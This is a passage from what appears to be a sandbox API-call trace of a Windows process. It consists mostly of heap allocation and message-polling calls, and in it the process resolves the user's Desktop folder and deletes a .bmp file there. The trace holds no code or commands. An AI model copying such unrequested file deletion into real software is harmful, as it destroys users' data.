hHeap=0x25c0000) returned 1 [0161.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0161.416] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.416] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.416] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.416] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.416] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.416] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.416] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.416] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.416] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.416] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.416] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.416] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.416] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.416] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0161.417] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.417] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0161.417] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.417] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.417] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0161.417] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.417] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.417] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.417] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.417] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.417] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.417] FreeLibrary (hLibModule=0x74d40000) returned 1 [0161.417] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.417] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0161.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.420] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0161.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.421] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.422] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0161.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0161.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0161.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0161.422] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0161.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0161.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0161.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0161.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0161.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0161.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0161.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0161.423] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0161.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0161.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0161.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0161.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0161.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0161.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0161.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0161.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0161.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0161.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0161.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf0) returned 0x2416f30 [0161.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0161.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0161.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24202f0 [0161.425] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/A4XY 5YOfDJ7NlnC.bmp", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A4XY 5YOfDJ7NlnC.bmp", lpFilePart=0x8bedfc*="A4XY 5YOfDJ7NlnC.bmp") returned 0x3a [0161.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0161.425] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A4XY 5YOfDJ7NlnC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a4xy 5yofdj7nlnc.bmp")) returned 0x20 [0161.425] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A4XY 5YOfDJ7NlnC.bmp", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc73ebf20, ftCreationTime.dwHighDateTime=0x1d4d474, ftLastAccessTime.dwLowDateTime=0xa7aee4b0, ftLastAccessTime.dwHighDateTime=0x1d4cc94, ftLastWriteTime.dwLowDateTime=0xa7aee4b0, ftLastWriteTime.dwHighDateTime=0x1d4cc94, nFileSizeHigh=0x0, nFileSizeLow=0x10c90, dwReserved0=0x25, dwReserved1=0x4, cFileName="A4XY 5YOfDJ7NlnC.bmp", cAlternateFileName="A4XY5Y~1.BMP")) returned 0xaa55e0 [0161.425] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A4XY 5YOfDJ7NlnC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a4xy 5yofdj7nlnc.bmp")) returned 1 [0161.427] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc73ebf20, ftCreationTime.dwHighDateTime=0x1d4d474, ftLastAccessTime.dwLowDateTime=0xa7aee4b0, ftLastAccessTime.dwHighDateTime=0x1d4cc94, ftLastWriteTime.dwLowDateTime=0xa7aee4b0, ftLastWriteTime.dwHighDateTime=0x1d4cc94, nFileSizeHigh=0x0, nFileSizeLow=0x10c90, dwReserved0=0x25, dwReserved1=0x4, cFileName="A4XY 5YOfDJ7NlnC.bmp", cAlternateFileName="A4XY5Y~1.BMP")) returned 0 [0161.427] FindClose (in: hFindFile=0xaa55e0 | out: hFindFile=0xaa55e0) returned 1 [0161.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0161.428] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0161.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0161.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0161.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0161.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0161.428] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0161.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0161.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0161.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0161.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0161.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0161.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0161.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0161.429] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0161.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0161.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0161.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0161.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0161.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0161.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0161.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0161.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0161.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0161.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0161.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf0) returned 0x2416f30 [0161.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0161.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0161.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0161.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0161.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0161.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24202f0 [0161.558] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/A4XY 5YOfDJ7NlnC.bmp", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A4XY 5YOfDJ7NlnC.bmp", lpFilePart=0x8bf658*="A4XY 5YOfDJ7NlnC.bmp") returned 0x3a [0161.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0161.559] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A4XY 5YOfDJ7NlnC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a4xy 5yofdj7nlnc.bmp")) returned 0xffffffff [0161.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0161.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0161.559] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0161.559] PeekMessageW (in: 